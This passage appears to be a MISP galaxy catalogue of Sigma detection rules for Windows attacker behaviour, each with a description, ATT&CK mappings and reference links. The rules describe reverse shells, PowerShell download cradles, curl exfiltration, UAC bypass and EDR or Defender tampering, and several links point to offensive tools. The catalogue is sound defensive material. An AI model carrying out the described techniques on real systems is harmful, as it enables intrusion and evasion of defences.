https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml

Curl Web Request With Potential Custom User-Agent

Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings

The tag is: misp-galaxy:sigma-rules="Curl Web Request With Potential Custom User-Agent"

Table 10170. Table References

Links

https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml

Suspicious Execution of Shutdown

Use of the commandline to shutdown or reboot windows

The tag is: misp-galaxy:sigma-rules="Suspicious Execution of Shutdown"

Suspicious Execution of Shutdown has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 10171. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_execution.yml

PUA - System Informer Execution

Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations

The tag is: misp-galaxy:sigma-rules="PUA - System Informer Execution"

PUA - System Informer Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 10172. Table References

Links

https://github.com/winsiderss/systeminformer

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_system_informer.yml

Suspicious RunAs-Like Flag Combination

Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools

The tag is: misp-galaxy:sigma-rules="Suspicious RunAs-Like Flag Combination"

Table 10173. Table References

Links

https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml

HackTool - EDRSilencer Execution

Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.

The tag is: misp-galaxy:sigma-rules="HackTool - EDRSilencer Execution"

HackTool - EDRSilencer Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 10174. Table References

Links

https://github.com/netero1010/EDRSilencer

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_edrsilencer.yml

PowerShell Web Download

Detects suspicious ways to download files or content using PowerShell

The tag is: misp-galaxy:sigma-rules="PowerShell Web Download"

PowerShell Web Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10175. Table References

Links

https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml

PUA - AdvancedRun Suspicious Execution

Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts

The tag is: misp-galaxy:sigma-rules="PUA - AdvancedRun Suspicious Execution"

PUA - AdvancedRun Suspicious Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

Table 10176. Table References

Links

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/

https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3

https://twitter.com/splinter_code/status/1483815103279603714

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml

HackTool - TruffleSnout Execution

Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.

The tag is: misp-galaxy:sigma-rules="HackTool - TruffleSnout Execution"

HackTool - TruffleSnout Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 10177. Table References

Links

https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md

https://github.com/dsnezhkov/TruffleSnout

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml

Suspicious Use of PsLogList

Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs

The tag is: misp-galaxy:sigma-rules="Suspicious Use of PsLogList"

Suspicious Use of PsLogList has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 10178. Table References

Links

https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/

https://twitter.com/EricaZelic/status/1614075109827874817

https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos

https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml

Potential Dropper Script Execution Via WScript/CScript

Detects wscript/cscript executions of scripts located in user directories

The tag is: misp-galaxy:sigma-rules="Potential Dropper Script Execution Via WScript/CScript"

Potential Dropper Script Execution Via WScript/CScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10179. Table References

Links

https://redcanary.com/blog/gootloader/

https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_dropper.yml

New Service Creation Using Sc.EXE

Detects the creation of a new service using the "sc.exe" utility.

The tag is: misp-galaxy:sigma-rules="New Service Creation Using Sc.EXE"

New Service Creation Using Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10180. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_create_service.yml

Non Interactive PowerShell Process Spawned

Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.

The tag is: misp-galaxy:sigma-rules="Non Interactive PowerShell Process Spawned"

Non Interactive PowerShell Process Spawned has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10181. Table References

Links

https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_non_interactive_execution.yml

Execute Files with Msdeploy.exe

Detects file execution using the msdeploy.exe lolbin

The tag is: misp-galaxy:sigma-rules="Execute Files with Msdeploy.exe"

Execute Files with Msdeploy.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10182. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/

https://twitter.com/pabraeken/status/995837734379032576

https://twitter.com/pabraeken/status/999090532839313408

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml

UAC Bypass Using PkgMgr and DISM

Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using PkgMgr and DISM"

UAC Bypass Using PkgMgr and DISM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10183. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml

Lolbin Runexehelper Use As Proxy

Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs

The tag is: misp-galaxy:sigma-rules="Lolbin Runexehelper Use As Proxy"

Lolbin Runexehelper Use As Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10184. Table References

Links

https://twitter.com/0gtweet/status/1206692239839289344

https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml

Dism Remove Online Package

Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

The tag is: misp-galaxy:sigma-rules="Dism Remove Online Package"

Dism Remove Online Package has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10185. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism

https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml

Suspicious Response File Execution Via Odbcconf.EXE

Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.

The tag is: misp-galaxy:sigma-rules="Suspicious Response File Execution Via Odbcconf.EXE"

Suspicious Response File Execution Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10187. Table References

Links

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml

Potential Windows Defender Tampering Via Wmic.EXE

Detects potential tampering with Windows Defender settings such as adding exclusion using wmic

The tag is: misp-galaxy:sigma-rules="Potential Windows Defender Tampering Via Wmic.EXE"

Potential Windows Defender Tampering Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 10188. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md

https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/

https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml

Hiding Files with Attrib.exe

Detects usage of attrib.exe to hide files from users.

The tag is: misp-galaxy:sigma-rules="Hiding Files with Attrib.exe"

Hiding Files with Attrib.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 10189. Table References

Links

https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/

https://www.uptycs.com/blog/lolbins-are-no-laughing-matter

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml

Suspicious Reg Add BitLocker

Detects suspicious addition to BitLocker related registry keys via the reg.exe utility

The tag is: misp-galaxy:sigma-rules="Suspicious Reg Add BitLocker"

Suspicious Reg Add BitLocker has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 10190. Table References

Links

https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_bitlocker.yml

Uncommon Child Process Of Appvlp.EXE

Detects uncommon child processes of Appvlp.EXE Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.

The tag is: misp-galaxy:sigma-rules="Uncommon Child Process Of Appvlp.EXE"

Uncommon Child Process Of Appvlp.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10191. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml

Potential Defense Evasion Via Right-to-Left Override

Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques.

The tag is: misp-galaxy:sigma-rules="Potential Defense Evasion Via Right-to-Left Override"

Potential Defense Evasion Via Right-to-Left Override has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002" with estimative-language:likelihood-probability="almost-certain"

Table 10192. Table References

Links

https://unicode-explorer.com/c/202E

https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method

https://redcanary.com/blog/right-to-left-override/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml

Windows Processes Suspicious Parent Directory

Detect suspicious parent processes of well-known Windows processes

The tag is: misp-galaxy:sigma-rules="Windows Processes Suspicious Parent Directory"

Windows Processes Suspicious Parent Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 10193. Table References

Links

https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/

https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2

https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml

File In Suspicious Location Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations

The tag is: misp-galaxy:sigma-rules="File In Suspicious Location Encoded To Base64 Via Certutil.EXE"

File In Suspicious Location Encoded To Base64 Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10194. Table References

Links

https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior

https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior

https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior

https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml

Suspicious Redirection to Local Admin Share

Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers

The tag is: misp-galaxy:sigma-rules="Suspicious Redirection to Local Admin Share"

Suspicious Redirection to Local Admin Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 10195. Table References

Links

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml

Wlrmdr Lolbin Use as Launcher

Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute

The tag is: misp-galaxy:sigma-rules="Wlrmdr Lolbin Use as Launcher"

Wlrmdr Lolbin Use as Launcher has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10196. Table References

Links

https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml

Renamed Mavinject.EXE Execution

Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag

The tag is: misp-galaxy:sigma-rules="Renamed Mavinject.EXE Execution"

Renamed Mavinject.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Mavinject - T1218.013" with estimative-language:likelihood-probability="almost-certain"

Table 10197. Table References

Links

https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection

https://github.com/SigmaHQ/sigma/issues/3742

https://twitter.com/Hexacorn/status/776122138063409152

https://twitter.com/gN3mes1s/status/941315826107510784

https://reaqta.com/2017/12/mavinject-microsoft-injector/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml

Potential Powershell ReverseShell Connection

Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.

The tag is: misp-galaxy:sigma-rules="Potential Powershell ReverseShell Connection"

Potential Powershell ReverseShell Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10198. Table References

Links

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml

New Remote Desktop Connection Initiated Via Mstsc.EXE

Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

The tag is: misp-galaxy:sigma-rules="New Remote Desktop Connection Initiated Via Mstsc.EXE"

New Remote Desktop Connection Initiated Via Mstsc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 10199. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml

Remote Access Tool - ScreenConnect Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Execution"

Remote Access Tool - ScreenConnect Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10200. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml

Suspicious Vsls-Agent Command With AgentExtensionPath Load

Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter

The tag is: misp-galaxy:sigma-rules="Suspicious Vsls-Agent Command With AgentExtensionPath Load"

Suspicious Vsls-Agent Command With AgentExtensionPath Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10201. Table References

Links

https://twitter.com/bohops/status/1583916360404729857

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml

Cmd.EXE Missing Space Characters Execution Anomaly

Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer).

The tag is: misp-galaxy:sigma-rules="Cmd.EXE Missing Space Characters Execution Anomaly"

Cmd.EXE Missing Space Characters Execution Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10202. Table References

Links

https://twitter.com/cyb3rops/status/1562072617552678912

https://ss64.com/nt/cmd.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml

Suspicious MSDT Parent Process

Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation

The tag is: misp-galaxy:sigma-rules="Suspicious MSDT Parent Process"

Suspicious MSDT Parent Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10203. Table References

Links

https://twitter.com/nao_sec/status/1530196847679401984

https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml

Potential PowerShell Command Line Obfuscation

Detects the PowerShell command lines with special characters

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Command Line Obfuscation"

Potential PowerShell Command Line Obfuscation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10204. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml

Potential Unquoted Service Path Reconnaissance Via Wmic.EXE

Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts

The tag is: misp-galaxy:sigma-rules="Potential Unquoted Service Path Reconnaissance Via Wmic.EXE"

Potential Unquoted Service Path Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10205. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py

https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml

Suspicious Desktopimgdownldr Command

Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet

The tag is: misp-galaxy:sigma-rules="Suspicious Desktopimgdownldr Command"

Suspicious Desktopimgdownldr Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10206. Table References

Links

https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/

https://twitter.com/SBousseaden/status/1278977301745741825

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml

HackTool - Certipy Execution

Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.

The tag is: misp-galaxy:sigma-rules="HackTool - Certipy Execution"

HackTool - Certipy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Authentication Certificates - T1649" with estimative-language:likelihood-probability="almost-certain"

Table 10207. Table References

Links

https://github.com/ly4k/Certipy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certipy.yml

Potential Commandline Obfuscation Using Escape Characters

Detects potential commandline obfuscation using known escape characters

The tag is: misp-galaxy:sigma-rules="Potential Commandline Obfuscation Using Escape Characters"

Potential Commandline Obfuscation Using Escape Characters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 10208. Table References

Links

https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/

https://twitter.com/Hexacorn/status/885553465417756673

https://twitter.com/Hexacorn/status/885570278637678592

https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques

https://twitter.com/vysecurity/status/885545634958385153

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml

PowerShell DownloadFile

Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line

The tag is: misp-galaxy:sigma-rules="PowerShell DownloadFile"

PowerShell DownloadFile has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10209. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml

Unusual Child Process of dns.exe

Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

The tag is: misp-galaxy:sigma-rules="Unusual Child Process of dns.exe"

Unusual Child Process of dns.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 10210. Table References

Links

https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_susp_child_process.yml

